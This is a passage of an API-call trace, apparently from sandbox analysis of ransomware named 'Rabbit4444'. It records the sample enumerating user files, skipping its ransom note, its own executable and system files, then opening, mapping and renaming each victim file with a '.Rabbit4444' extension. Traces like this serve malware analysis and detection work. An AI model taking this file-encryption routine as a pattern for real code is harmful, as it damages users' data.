dwMaximumSizeLow=0x6a0, lpName=0x0) returned 0x298 [0059.216] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a0) returned 0x70000 [0059.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.217] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.217] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15052781263) returned 1 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.217] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.217] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.217] CloseHandle (hObject=0x298) returned 1 [0059.217] CloseHandle (hObject=0x278) returned 1 [0059.217] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms.Rabbit4444") returned 192 [0059.217] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96bc4455-fda3-4de2-8b71-9d1953f0b32d}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96BC4455-FDA3-4DE2-8B71-9D1953F0B32D}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96bc4455-fda3-4de2-8b71-9d1953f0b32d}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.218] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53fc5720, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x53fc5720, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2241abe6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", cAlternateFileName="CLCFC0~1.SET")) returned 1 [0059.218] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.218] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2=".") returned 1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="..") returned 1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="windows") returned -1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="boot") returned 1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.219] lstrcmpiW (lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.219] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms" | out: lpString1="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms") returned="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms" [0059.219] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.219] lstrlenW (lpString="Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms") returned 64 [0059.219] lstrlenW (lpString="Rabbit4444") returned 10 [0059.219] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.219] lstrlenW (lpString=".dll") returned 4 [0059.219] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.219] lstrlenW (lpString=".lnk") returned 4 [0059.219] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.219] lstrlenW (lpString=".ini") returned 4 [0059.219] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.219] lstrlenW (lpString=".sys") returned 4 [0059.219] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.219] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96df8b78-8299-4bc1-b56b-6c375fbec228}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.220] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.220] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15053055260) returned 1 [0059.220] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=941) returned 1 [0059.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.220] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0059.220] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.224] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.225] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0059.225] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15053588843) returned 1 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.225] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0059.225] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.225] CloseHandle (hObject=0x298) returned 1 [0059.225] CloseHandle (hObject=0x278) returned 1 [0059.225] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms.Rabbit4444") returned 192 [0059.226] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96df8b78-8299-4bc1-b56b-6c375fbec228}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{96DF8B78-8299-4BC1-B56B-6C375FBEC228}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{96df8b78-8299-4bc1-b56b-6c375fbec228}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.226] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540f698d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x540f698d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", cAlternateFileName="CLA809~1.SET")) returned 1 [0059.226] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.226] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.226] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2=".") returned 1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="..") returned 1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="windows") returned -1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="boot") returned 1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.227] lstrcmpiW (lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.227] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms" | out: lpString1="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms") returned="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms" [0059.227] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.227] lstrlenW (lpString="Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms") returned 64 [0059.227] lstrlenW (lpString="Rabbit4444") returned 10 [0059.227] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.227] lstrlenW (lpString=".dll") returned 4 [0059.227] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.227] lstrlenW (lpString=".lnk") returned 4 [0059.227] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.227] lstrlenW (lpString=".ini") returned 4 [0059.227] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.227] lstrlenW (lpString=".sys") returned 4 [0059.227] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.227] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9891d47b-7e37-4265-bad2-1fa991543b90}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.228] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.228] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15053852183) returned 1 [0059.228] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=950) returned 1 [0059.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.228] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0059.228] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x298 [0059.232] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x70000 [0059.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0059.233] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.233] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0059.234] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15054436440) returned 1 [0059.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.234] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0059.234] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.234] CloseHandle (hObject=0x298) returned 1 [0059.234] CloseHandle (hObject=0x278) returned 1 [0059.234] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms.Rabbit4444") returned 192 [0059.234] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9891d47b-7e37-4265-bad2-1fa991543b90}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{9891D47B-7E37-4265-BAD2-1FA991543B90}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{9891d47b-7e37-4265-bad2-1fa991543b90}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.235] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54227c20, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54227c20, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2211fcec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", cAlternateFileName="CL5EBE~1.SET")) returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2=".") returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="..") returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="windows") returned -1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="boot") returned 1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.235] lstrcmpiW (lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.235] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms" | out: lpString1="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms") returned="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms" [0059.235] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.235] lstrlenW (lpString="Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms") returned 64 [0059.236] lstrlenW (lpString="Rabbit4444") returned 10 [0059.236] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.236] lstrlenW (lpString=".dll") returned 4 [0059.236] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.236] lstrlenW (lpString=".lnk") returned 4 [0059.236] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.236] lstrlenW (lpString=".ini") returned 4 [0059.236] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.236] lstrlenW (lpString=".sys") returned 4 [0059.236] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.236] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{98cca0b9-cf6c-4ffd-98e1-87bfeddd4d21}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.236] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.236] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15054693397) returned 1 [0059.236] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=976) returned 1 [0059.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.236] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.236] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.237] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.238] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.238] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.239] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15054948555) returned 1 [0059.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.239] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.239] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.239] CloseHandle (hObject=0x298) returned 1 [0059.239] CloseHandle (hObject=0x278) returned 1 [0059.239] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms.Rabbit4444") returned 192 [0059.239] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{98cca0b9-cf6c-4ffd-98e1-87bfeddd4d21}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{98CCA0B9-CF6C-4FFD-98E1-87BFEDDD4D21}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{98cca0b9-cf6c-4ffd-98e1-87bfeddd4d21}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.240] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x543cb64e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x543cb64e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ee, 